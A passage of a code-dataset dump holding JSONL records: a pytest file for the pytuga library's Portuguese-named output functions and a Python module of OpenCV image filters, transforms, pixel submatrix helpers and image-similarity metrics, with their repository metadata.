{"api_name": "os.path.exists", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 10, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 22, "usage_type": "call"}, {"api_name": "rasterio.crs.CRS", "line_number": 31, "usage_type": "call"}, {"api_name": "rasterio.crs", "line_number": 31, "usage_type": "attribute"}, {"api_name": "rasterio.open", "line_number": 32, "usage_type": "call"}, {"api_name": "rasterio.open", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 55, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 63, "usage_type": "call"}, {"api_name": "time.time", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "27375967197", "text": "import pytest\nfrom faker import Faker\nfrom random import randint\nimport pytuga.lib.tuga_io as tuga_io\nfake = Faker()\n\ndef test_mostrar_alerta(capsys):\n\trandom_name = fake.name()\n\ttuga_io.mostrar(random_name)\n\tout, err = capsys.readouterr()\n\tassert out == \"{}\\n\".format(random_name)\n\ttuga_io._alert(random_name)\n\tout, err = capsys.readouterr()\n\tassert out == \"{}\\n\".format(random_name)\n\ttuga_io.alerta(random_name)\n\tout, err = capsys.readouterr()\n\tassert out == \"{}\\n\".format(random_name)\n\ndef test_mostrar_formatado(capsys):\n\trandom_name = fake.name()\n\tname_tag = \"{} %s\".format(random_name)\n\trandom_int = randint(0, 100)\n\ttuga_io.mostrar_formatado(name_tag, random_int)\n\tout, err = capsys.readouterr()\n\tassert out == \"{} {}\\n\".format(random_name, random_int)\n\ndef test_pausar(capsys):\n\twith capsys.disabled():\n\t\ttuga_io.pausar()\n", "repo_name": "Transpyler/pytuga", "sub_path": "tests/test_tuga_io.py", "file_name": "test_tuga_io.py", "file_ext": "py", "file_size_in_byte": 830, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "52", "api": [{"api_name": "faker.Faker", "line_number": 5, "usage_type": "call"}, {"api_name": "pytuga.lib.tuga_io.mostrar", "line_number": 9, "usage_type": "call"}, {"api_name": "pytuga.lib.tuga_io", "line_number": 9, "usage_type": "name"}, {"api_name": "pytuga.lib.tuga_io._alert", "line_number": 12, "usage_type": "call"}, {"api_name": "pytuga.lib.tuga_io", "line_number": 12, "usage_type": "name"}, {"api_name": "pytuga.lib.tuga_io.alerta", "line_number": 15, "usage_type": "call"}, {"api_name": "pytuga.lib.tuga_io", "line_number": 15, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 22, "usage_type": "call"}, {"api_name": "pytuga.lib.tuga_io.mostrar_formatado", "line_number": 23, "usage_type": "call"}, {"api_name": "pytuga.lib.tuga_io", "line_number": 23, "usage_type": "name"}, {"api_name": "pytuga.lib.tuga_io.pausar", "line_number": 29, "usage_type": "call"}, {"api_name": "pytuga.lib.tuga_io", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "44666732967", "text": "import cv2 as cv\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom skimage.metrics import structural_similarity, mean_squared_error, peak_signal_noise_ratio, normalized_mutual_information\r\nimport math\r\n\r\n## Start of image filters section\r\ndef lowPassFilter(in_file: str, out_file: str, size: int = 3, type: int = 1):\r\n \"\"\"This function applies a low pass filter to a grayscale image. The resulting image is then saved to disk\r\n The size parameter only affects type = 1 masks\r\n \"\"\"\r\n # Reading the input image\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n # Creating the matrix filter (sizeXsize)\r\n filter = np.ones((size, size))\r\n if (type == 1): # Type 1 filter\r\n filter = 1/size**2 * filter\r\n elif (type == 2): # Type 2 filter\r\n filter = np.array([[0.0625, 0.125, 0.0625], [0.125, 0.25, 0.125], [0.0625, 0.125, 0.0625]])\r\n elif (type == 3): # Type 3 filter\r\n filter = np.array([[0, 0.125, 0], [0.125, 0.5, 0.125], [0, 0.125, 0]])\r\n\r\n # Applying the filter\r\n # Second parameter = -1 : keeps the same colordepth\r\n result = cv.filter2D(original, -1, filter)\r\n\r\n # Save it to disk\r\n cv.imwrite(out_file, result)\r\n\r\ndef highPassFilter(in_file: str, out_file: str, size: int = 3, sharpen: bool = False):\r\n \"\"\"This function applies a high pass filter to a grayscale image. The resulting image is then saved to disk\r\n sharpen = True, adds the resulting image to the original one so the edges are sharpened\r\n \"\"\"\r\n # Reading the input image\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n # Creating the matrix filter (sizeXsize)\r\n filter = -1/size**2 * np.ones((size, size))\r\n filter[math.floor(size/2), math.floor(size/2)] += 1.0\r\n\r\n # Applying the filter\r\n # Second parameter = -1 : keeps the same colordepth\r\n result = cv.filter2D(original, -1, filter)\r\n\r\n # Save it to disk\r\n if sharpen:\r\n # The result gets added (and not substracted), because the center element (filter[math.floor(size/2), math.floor(size/2)]) is positive\r\n cv.imwrite(out_file, original + result)\r\n else:\r\n cv.imwrite(out_file, result)\r\n\r\ndef medianFilter(in_file: str, out_file: str, size: int = 3):\r\n \"\"\"This function applies a median filter to a grayscale image. The resulting image is then saved to disk\"\"\"\r\n # Reading the input image\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n \r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n # Applying mediang filter (sizeXsize)\r\n result = cv.medianBlur(original, size)\r\n\r\n # Save it to disk\r\n cv.imwrite(out_file, result)\r\n\r\ndef hSobelFilter(in_file: str, out_file: str, size: int = 3):\r\n \"\"\"This function applies a horizontal Sobel filter to a grayscale image. The resulting image is then saved to disk\"\"\"\r\n # Reading the input image\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n # Applying horizontal Sobel filter (sizeXsize)\r\n result = cv.Sobel(original, -1, 1, 0, ksize=size)\r\n\r\n # Save it to disk\r\n cv.imwrite(out_file, result)\r\n\r\ndef vSobelFilter(in_file: str, out_file: str, size: int = 3):\r\n \"\"\"This function applies a vertical Sobel filter to a grayscale image. The resulting image is then saved to sisk\"\"\"\r\n # Reading the input image\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n # Applying vertical Sobel filter (sizeXsize)\r\n result = cv.Sobel(original, -1, 0, 1, ksize=size)\r\n\r\n # Save it to disk\r\n cv.imwrite(out_file, result)\r\n\r\ndef gaussianFilter(in_file: str, out_file: str, size: int = 3, sigmaX: float = 0):\r\n \"\"\"This function applies a Gaussian blur filter to a grayscale image. The resulting image is then saved to sisk\"\"\"\r\n # Reading the input image\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n # Applying Gaussian filter (sizeXsize)\r\n # if sigmaX = 0, it's calculated from the kernel size as follows: \r\n # sigmaX = 0.3*((size-1)*0.5 - 1) + 0.8\r\n result = cv.GaussianBlur(original, (size, size), sigmaX=sigmaX) \r\n\r\n # Save it to disk\r\n cv.imwrite(out_file, result)\r\n\r\ndef cannyFilter(in_file: str, out_file: str, low_thres: int = 100, up_thres: int = 175):\r\n \"\"\"This function applies a Canny filter to a grayscale image. The resulting image is then saved to sisk\r\n low_thres is the lower threshold (gray value)\r\n up_thres is the upper threshold (gray value)\r\n \"\"\"\r\n # Reading the input image\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n # Applying Canny filter \r\n result = cv.Canny(original, low_thres, up_thres) \r\n\r\n # Save it to disk\r\n cv.imwrite(out_file, result)\r\n\r\ndef laplaceFilter(in_file: str, out_file: str, size: int = 3):\r\n \"\"\"This function applies a Laplacian filter to a grayscale image. The resulting image is then saved to disk\"\"\"\r\n # Reading the input image\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n # Applying Canny filter \r\n result = cv.Laplacian(original, ddepth=-1, ksize=size) # ddepth = -1 makes no changes to original color depth\r\n\r\n # Save it to disk\r\n cv.imwrite(out_file, result)\r\n\r\ndef bilateralFilter(in_file: str, out_file: str, size: int = 3, sigma: float = 250):\r\n \"\"\"This function applies a bilateral filter to a grayscale image. The resulting image is then saved to disk\"\"\"\r\n # Reading the input image\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n # Applying the filter\r\n result = cv.bilateralFilter(original, d=size, sigmaColor=sigma, sigmaSpace=sigma)\r\n\r\n # Save it to disk\r\n cv.imwrite(out_file, result)\r\n\r\ndef motionBlurFilter(in_file: str, out_file: str):\r\n \"\"\"This function applies a motion blur filter to a grayscale image. The resulting image is then saved to disk\"\"\"\r\n # Reading the input image\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n filter = np.array([[0, 0, 0.32], [0.32, 0.33, 0.01], [0.01, 0, 0]])\r\n\r\n # Applying the filter\r\n # Second parameter = -1 : keeps the same colordepth\r\n result = cv.filter2D(original, -1, filter)\r\n\r\n # Save it to disk\r\n cv.imwrite(out_file, result)\r\n\r\ndef sharpenFilter(in_file: str, out_file: str):\r\n \"\"\"This function applies a sharpening filter to a grayscale image. The resulting image is then saved to disk\"\"\"\r\n # Reading the input image\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n filter = np.array([[0, -1, 0], [-1, 5, -1], [0, -1, 0]])\r\n\r\n # Applying the filter\r\n # Second parameter = -1 : keeps the same colordepth\r\n result = cv.filter2D(original, -1, filter)\r\n\r\n # Save it to disk\r\n cv.imwrite(out_file, result)\r\n\r\ndef embossFilter(in_file: str, out_file: str):\r\n \"\"\"This function applies a sharpening filter to a grayscale image. The resulting image is then saved to disk\"\"\"\r\n # Reading the input image\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n filter = np.array([[-2, -1, 0], [-1, 1, -1], [0, 1, 2]])\r\n\r\n # Applying the filter\r\n # Second parameter = -1 : keeps the same colordepth\r\n result = cv.filter2D(original, -1, filter, borderType=cv.BORDER_CONSTANT)\r\n\r\n # Save it to disk\r\n cv.imwrite(out_file, result)\r\n\r\ndef customFilter(in_file: str, out_file: str):\r\n \"\"\"This function applies a filter (this behaves like a mixture of low and high pass) to a grayscale image. The resulting image is then saved to disk\"\"\"\r\n # Reading the input image\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n # Creating the matrix filter (sizeXsize)\r\n filter = np.array([[0.5, 0, -0.5], [0, 1, 0], [0.5, 0, -0.5]])\r\n\r\n # Applying the filter\r\n # Second parameter = -1 : keeps the same colordepth\r\n result = cv.filter2D(original, -1, filter)\r\n\r\n # Save it to disk\r\n cv.imwrite(out_file, result)\r\n\r\ndef histogramEq(in_file: str, out_file: str):\r\n \"\"\"This function equalizes the histogram of a grayscale image. The resulting image is then saved to disk\"\"\"\r\n # Reading the input image\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n # Equalizing the histogram\r\n result = cv.equalizeHist(original)\r\n\r\n # Save it to disk\r\n cv.imwrite(out_file, result)\r\n## End of image filters section\r\n\r\n## Start of image transformation section\r\ndef rotateImage(in_file: str, out_file: str, angle: float, in_img: cv.Mat = None) -> cv.Mat:\r\n \"\"\"This function rotates an imagen an angle. The resulting image is then saved to disk\r\n If angle > 0 : rotation is clockwise, otherwise is counterclockwise\r\n \"\"\"\r\n if in_img is None:\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n else:\r\n original = in_img\r\n \r\n # Generating the rotation matrix\r\n (height, width) = original.shape\r\n M = cv.getRotationMatrix2D((width/2, height/2), angle, 1) \r\n\r\n # Applying the rotation\r\n result = cv.warpAffine(original, M, (width, height), borderMode=cv.BORDER_REPLICATE) # This tuple goes backwards!\r\n\r\n # Save it to disk\r\n if out_file is not None:\r\n cv.imwrite(out_file, result)\r\n \r\n return result\r\n\r\ndef scaleImage(in_file: str, out_file: str, scale_percent : float, in_img: cv.Mat = None) -> cv.Mat:\r\n \"\"\"This function scales an imagen by scale_percent. The resulting image is then saved to disk\r\n If scale_percent > 1 : image gets \"zoomed in\", otherwise \"zoomed out\"\r\n \"\"\"\r\n if in_img is None:\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n else:\r\n original = in_img\r\n \r\n # Generating the rotation matrix\r\n (height, width) = original.shape\r\n M = cv.getRotationMatrix2D((width/2, height/2), 0, scale_percent) \r\n\r\n # Applying the rotation\r\n result = cv.warpAffine(original, M, (width, height), borderMode=cv.BORDER_REPLICATE) # This tuple goes backwards!\r\n\r\n # Save it to disk\r\n if out_file is not None:\r\n cv.imwrite(out_file, result)\r\n \r\n return result\r\n\r\ndef translateImage(in_file: str, out_file: str, tx: int, ty: int, in_img: cv.Mat = None) -> cv.Mat:\r\n \"\"\"This function translates an imagen by tx, ty. The resulting image is then saved to disk\r\n \"\"\"\r\n if in_img is None:\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n else:\r\n original = in_img\r\n \r\n # Generating the rotation matrix\r\n (height, width) = original.shape\r\n M = np.float32([[1, 0, tx], [0, 1, ty]])\r\n\r\n # Applying the rotation\r\n result = cv.warpAffine(original, M, (width, height), borderMode=cv.BORDER_REPLICATE) # This tuple goes backwards!\r\n\r\n # Save it to disk\r\n if out_file is not None:\r\n cv.imwrite(out_file, result)\r\n \r\n return result\r\n\r\ndef totalTransformation(in_file: str, out_file: str, angle: float, scale_factor: float, tx: int, ty: int):\r\n \"\"\"This function applies all transformations functions to an image and saves it to disk\r\n \"\"\"\r\n original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n if original is None: # If image wasn't read, then the file doesn't exist\r\n raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n \r\n # Apply rotation\r\n result = rotateImage(in_file = None, out_file=None, angle=angle, in_img=original)\r\n\r\n # Apply scaling\r\n result = scaleImage(in_file = None, out_file=None, scale_percent=scale_factor, in_img=result)\r\n\r\n # Apply translation\r\n result = translateImage(in_file = None, out_file=None, tx=tx, ty=ty, in_img=result)\r\n\r\n # Save it to disk\r\n cv.imwrite(out_file, result)\r\n\r\n## End of image transformation section\r\n\r\n## Start of subimage section\r\ndef getOriginalImgSubmatrices(in_img: cv.Mat, sub_size: int = 3) -> pd.DataFrame:\r\n \"\"\"Return the original image sliced into sub_sizeXsub_size submatrices necessary for later processing.\r\n sub_size must be and odd integer\r\n \"\"\"\r\n if sub_size % 2 == 0:\r\n raise RuntimeError('The submatrix size must be odd')\r\n \r\n # Size of padding needed to be added\r\n padding_size = int((sub_size - 1) / 2)\r\n # List which will store the submatrices\r\n sub_list = []\r\n\r\n # To create the submatrices, the default OpenCV BorderType behavior will be replicated\r\n # To do this, padding needs to be added to the image\r\n # OpenCV BORDER_REFLECT_101 reflects the pixels in the following manner gfedcb|abcdefgh|gfedcba\r\n padded_img = cv.copyMakeBorder(in_img, top=padding_size, bottom=padding_size, left=padding_size, right=padding_size, borderType=cv.BORDER_REFLECT_101)\r\n\r\n # shape[0] is the image height, shape[1] is the image width\r\n (height, width) = padded_img.shape\r\n\r\n for i in range(0, height - sub_size + 1): # loop through rows \r\n for j in range(0, width - sub_size + 1): # loop through columns\r\n cur_sub = np.array(padded_img[i:i + sub_size, j:j + sub_size]) # current iteration submatrix\r\n sub_list.append(np.reshape(cur_sub, newshape=(1, np.product((sub_size, sub_size))))[0])\r\n\r\n return pd.DataFrame(np.array(sub_list, dtype=np.uint8))\r\n \r\ndef getFilteredImgSubmatrices(in_img: cv.Mat) -> pd.DataFrame:\r\n \"\"\"Return the filtered image resulting submatrix (actually just a pixel)\"\"\"\r\n # shape[0] is the image height, shape[1] is the image width\r\n (height, width) = in_img.shape\r\n # List which will store the submatrices\r\n sub_list = []\r\n\r\n # For the filtered images, just the central pixel of the original submatrices is needed\r\n # This means that only in_img[i, j] is needed\r\n for i in range(0, height): # loop through rows\r\n for j in range(0, width): # loop through columns\r\n cur_sub = np.array([in_img[i, j]])\r\n sub_list.append(cur_sub)\r\n\r\n return pd.DataFrame(np.array(sub_list, dtype=np.uint8))\r\n## End of subimage section\r\n\r\n## Start of rebuild image section\r\ndef rebuildImages(pixels, height: int, width: int) -> list[cv.Mat]:\r\n \"\"\"This function rebuilds a list of images\"\"\"\r\n num_pixels = height * width\r\n img_list = []\r\n\r\n for i in range(0, len(pixels.values), num_pixels):\r\n cur_pixels = pixels.values[i:(i+num_pixels)]\r\n cur_img = rebuildSingleImage(cur_pixels, height, width)\r\n img_list.append(cur_img)\r\n\r\n return img_list\r\n\r\ndef rebuildSingleImage(pixels: np.array, height: int, width: int) -> cv.Mat:\r\n \"\"\"This function rebuilds an image, heightXwidth in size with its pixels\"\"\"\r\n cur_pixel = 0\r\n rebuilt_img = np.zeros((height, width), dtype=np.uint8)\r\n\r\n for i in range(0, height): # loop through rows \r\n for j in range(0, width): # loop through columns\r\n rebuilt_img[i, j] = pixels[cur_pixel]\r\n cur_pixel += 1\r\n\r\n return rebuilt_img\r\n\r\ndef predictionProcessing(pred: np.array) -> pd.DataFrame:\r\n \"\"\"This function corrects any out of bound values for np.uint8 and returns the values as a DataFrame\"\"\"\r\n # Checking for underflow and overflow\r\n for i in range(0, len(pred)):\r\n if (pred[i] < 0):\r\n pred[i] = np.array([0])\r\n elif (pred[i] > 255):\r\n pred[i] = np.array([255])\r\n\r\n # Converting the predictions into a DataFrame\r\n return pd.DataFrame(pred).astype(np.uint8)\r\n## End of rebuild image section\r\n\r\n## Start of frequency domain section\r\ndef fourierTransform(img: cv.Mat, shifted: bool = True):\r\n \"\"\"This function returns the 2D FFT of an image. If shifted is True, the zero frequency component will be brought to the center\"\"\"\r\n f = np.fft.fft2(img)\r\n if shifted:\r\n f = np.fft.fftshift(f)\r\n \r\n # to avoid zero values, and negative values in the final result, every value below 1 is now 1\r\n # a bit tacky, but...\r\n f = np.abs(f)\r\n f[f < 1] = 1 \r\n\r\n return 20*np.log10(f)\r\n## End of frequency domain section\r\n\r\n## Start of image similarity measurement section\r\ndef getSSIM(ref: cv.Mat, test: cv.Mat) -> tuple[np.float64, cv.Mat]:\r\n \"\"\"This function calculates the structural similarity index, which indicates how similar images ref and test are.\r\n 0 indicates totally dissimilar images\r\n 1 indicates identical images\r\n It also returns a difference image\r\n \"\"\"\r\n (ssim, diff) = structural_similarity(ref, test, full=True)\r\n \r\n # diff is returned as a float array with values in the [0, 1] range\r\n # Conversion to uint8 is need to be able to show or save the image\r\n diff = (diff * 255).astype(\"uint8\")\r\n\r\n return (ssim, diff)\r\n\r\ndef getPSNR(ref: cv.Mat, test: cv.Mat) -> np.float64:\r\n \"\"\"Calculates the peak signal to noise ratio of two images\r\n Lower values (potentially negative) indicate dissimilarity\r\n Higher values (potentially infinity) indicate similarity\r\n \"\"\"\r\n return peak_signal_noise_ratio(ref, test)\r\n\r\ndef getNMI(ref: cv.Mat, test: cv.Mat) -> np.float64:\r\n \"\"\"Calculates the normalized mutual information of two images\r\n 1 indicates uncorrelated images\r\n 2 indicates correlated images\r\n \"\"\"\r\n nmi = normalized_mutual_information(ref, test)\r\n\r\n # assuming that if the nmi is nan, the images can be totally correlated\r\n return 2.0 if np.isnan(nmi) else nmi\r\n\r\ndef getMSE(ref: cv.Mat, test: cv.Mat) -> np.float64:\r\n \"\"\"Calculates the mean squared error of two images\"\"\"\r\n return mean_squared_error(ref, test)\r\n## End of image similarity measurement section\r\n\r\n# Show a message if the script is run by itself\r\nif __name__ == '__main__':\r\n print(\"This script is not desingned to be standalone.\")", "repo_name": "JosBarranquero/ML_filtered_images", "sub_path": "scripts_python/image_utils.py", "file_name": "image_utils.py", "file_ext": "py", "file_size_in_byte": 19994, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.imread", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 13, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.filter2D", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 45, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.filter2D", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 55, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 62, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 62, "usage_type": "attribute"}, {"api_name": "cv2.medianBlur", "line_number": 68, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 71, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 76, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 76, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 90, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 90, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 96, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 99, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 104, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 104, "usage_type": "attribute"}, {"api_name": "cv2.GaussianBlur", "line_number": 112, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 115, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 123, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 123, "usage_type": "attribute"}, {"api_name": "cv2.Canny", "line_number": 129, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 132, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 137, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 137, "usage_type": "attribute"}, {"api_name": "cv2.Laplacian", "line_number": 143, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 146, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 151, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 151, "usage_type": "attribute"}, {"api_name": "cv2.bilateralFilter", "line_number": 157, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 160, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 165, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 165, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 170, "usage_type": "call"}, {"api_name": "cv2.filter2D", "line_number": 174, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 177, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 182, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 182, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 187, "usage_type": "call"}, {"api_name": "cv2.filter2D", "line_number": 191, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 194, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 199, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 199, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 204, "usage_type": "call"}, {"api_name": "cv2.filter2D", "line_number": 208, "usage_type": "call"}, {"api_name": "cv2.BORDER_CONSTANT", "line_number": 208, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 211, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 216, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 216, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 222, "usage_type": "call"}, {"api_name": "cv2.filter2D", "line_number": 226, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 229, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 234, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 234, "usage_type": "attribute"}, {"api_name": "cv2.equalizeHist", "line_number": 240, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 243, "usage_type": "call"}, {"api_name": "cv2.Mat", "line_number": 247, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 252, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 252, "usage_type": "attribute"}, {"api_name": "cv2.getRotationMatrix2D", "line_number": 261, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 264, "usage_type": "call"}, {"api_name": "cv2.BORDER_REPLICATE", "line_number": 264, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 268, "usage_type": "call"}, {"api_name": "cv2.Mat", "line_number": 272, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 277, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 277, "usage_type": "attribute"}, {"api_name": "cv2.getRotationMatrix2D", "line_number": 286, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 289, "usage_type": "call"}, {"api_name": "cv2.BORDER_REPLICATE", "line_number": 289, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 293, "usage_type": "call"}, {"api_name": "cv2.Mat", "line_number": 297, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 301, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 301, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 310, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 313, "usage_type": "call"}, {"api_name": "cv2.BORDER_REPLICATE", "line_number": 313, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 317, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 324, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 324, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 339, "usage_type": "call"}, {"api_name": "cv2.Mat", "line_number": 344, "usage_type": "attribute"}, {"api_name": "cv2.copyMakeBorder", "line_number": 359, "usage_type": "call"}, {"api_name": "cv2.BORDER_REFLECT_101", "line_number": 359, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 366, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.product", "line_number": 367, "usage_type": 